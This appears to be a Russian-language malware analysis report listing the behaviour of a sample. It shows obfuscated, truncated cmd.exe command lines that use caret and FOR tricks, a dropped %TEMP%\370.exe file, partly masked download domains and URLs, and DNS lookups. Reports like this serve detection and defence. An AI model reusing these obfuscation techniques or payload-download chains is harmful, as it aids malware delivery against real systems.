Техническая информация
- '<SYSTEM32>\cmd.exe' /c F^oR , ; /^f ; " delims=nZa4FH tokens= +2 " ; %n ; ; ^IN , ( , ; ' , , ^^f^^TYpe ; , ^| ; ^^Find , "mdFi" ; ; ' , ; ) ; ; DO ; %n; ; 47/V;H^+}@o8u2E ^ , , W0b/%TmP:~ -8, 1%...
- %TEMP%\370.exe
- %TEMP%\370.exe
- 'jo##lan.com':80
- 'bo##i.top':80
- 'la###de.com.tr':80
- 'ds###ttoo.com':80
- 'ds###ttoo.com':443
- 'st####ctory-era.ru':80
- 'st####ctory-era.ru':443
- http://www.jo##lan.com/CZqjcM/
- http://www.jo##lan.com/cgi-sys/suspendedpage.cgi
- http://www.bo##i.top/uH7oau/
- http://ds###ttoo.com/XUyfw4Sn/
- http://www.st####ctory-era.ru/cdXijR3Z/
- 'ds###ttoo.com':443
- 'st####ctory-era.ru':443
- DNS ASK jo##lan.com
- DNS ASK bo##i.top
- DNS ASK la###de.com.tr
- DNS ASK ds###ttoo.com
- DNS ASK st####ctory-era.ru
- '<SYSTEM32>\cmd.exe' /c F^oR , ; /^f ; " delims=nZa4FH tokens= +2 " ; %n ; ; ^IN , ( , ; ' , , ^^f^^TYpe ; , ^| ; ^^Find , "mdFi" ; ; ' , ; ) ; ; DO ; %n; ; 47/V;H^+}@o8u2E ^ , , W0b/%TmP:~ -8, 1%...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ^f^TYpe | ^Find "mdFi"
- '<SYSTEM32>\cmd.exe' /S /D /c" fTYpe "
- '<SYSTEM32>\find.exe' "mdFi"
- '<SYSTEM32>\cmd.exe' ; ; 47/V;H+}@o8u2E , , W0b/c " ; , (^SeT ] ^ ^ =Do^XsbB}0^+tMl4^)W$^ x';7^(ZF2A\mL/kJh:^cNRrCHn@{ed^P^uyvfizS.^=3^w^apj,U-^qE)&& , f^or ; , %^X ; ^In ; ; ( ;5^8 ; ;^ +1 56 4^3 , ^+37...